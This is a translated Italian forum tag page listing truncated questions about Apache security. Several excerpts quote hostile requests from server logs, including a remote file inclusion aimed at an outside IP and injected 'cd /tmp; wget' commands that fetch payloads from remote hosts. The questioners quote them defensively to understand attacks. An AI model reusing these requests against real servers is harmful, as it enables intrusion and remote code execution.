Domande con tag 'apache'

domande con tag
2
risposte

Qual è il modo migliore per prevenire l'iniezione di codice in Apache / PHP?

Ho recentemente installato wordpress su un VPS, ed è continuamente sotto attacco da allora. Ho preso alcune misure per proteggere da alcuni attacchi bruteforce, tuttavia osservando alcuni dei log non sono sicuro che sia sufficiente. Di seguit...
posta 02.11.2017 - 12:39
1
risposta

Disconnessione dall'autenticazione HTTP di base

Come visto su link , ci sono alcuni modi interessanti di disconnettere un utente dall'autenticazione HTTP di base. Attualmente sto inviando un HTTP 401 per farlo in questo modo: GET logout.php <?php header('HTTP/1.1 401 Unauthorize...
posta 30.09.2014 - 21:00
3
risposte

L'app web è sicura in una cartella non pubblica?

Mi sto chiedendo se è davvero sicuro usare questa struttura della mia applicazione web. WEBAPP Application Controllers Models Views ... Framework ... Core Public ... i...
posta 27.04.2014 - 11:37
3
risposte

Attacco root del server?

Qualcuno in Ungheria ha provato qualcosa di strano di recente: /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? Questo è l'URL parziale del mio log, che mostra la pagina a cui sono andati. Hanno dato l'URL del mio sito come referrer...
posta 06.04.2013 - 13:08
1
risposta

Come può funzionare questo attacco?

Stavo navigando nei miei log di apache e ho trovato la seguente richiesta (che ha provocato un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32%...
posta 26.03.2017 - 20:29
2
risposte

Protezione dell'iniezione di codice tramite chattr su file php?

Recentemente, un sito web che ho ospitato (un sito wordpress) per un amico è stato violato e tutte le pagine php hanno aggiunto del codice in fondo sotto forma di echo base64_encode(...); . Quindi c'erano annunci indesiderati su molta pagina...
posta 13.01.2015 - 12:19
3
risposte

Log di Apache, registrazione sospetta apach0day

oggi ho ricevuto questo 16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day" quindi con HTTP_USER_AGENT: chroot-apach0day REQUE...
posta 28.07.2014 - 21:28
2
risposte

Cos'è questa strana richiesta GET (GET / A0A32579-2767) DoSed my apache?

Ho apache dietro nginx sul mio server web. Oggi il mio apache smette di rispondere alle richieste. Le indagini mostrano questa situazione: Il numero di processi di apache cresce più di 500 ma MaxChildren=256 in config (ho mpm_itk, h...
posta 02.11.2014 - 16:54
1
risposta

Siamo sotto il controllo degli hacker?

Abbiamo un server Web che monta CentOS. Su quel WS c'è un Apache (versione 2.2.3) e alcuni siti. È possibile accedere solo se si dispone di un certificato (per utente root) o via ftp (una partizione ristretta di dati per i contenuti di upload...
posta 15.05.2012 - 10:48
1
risposta

Ospitare più siti Web in modo sicuro

Sorprendentemente non sono riuscito a trovare argomenti correlati qui, quindi metterò questo. Ho più siti Web in esecuzione sullo stesso server, costruiti con vari CMS e framework. Devo isolarli completamente. Ho bisogno di questo perché in futu...
posta 31.03.2016 - 14:41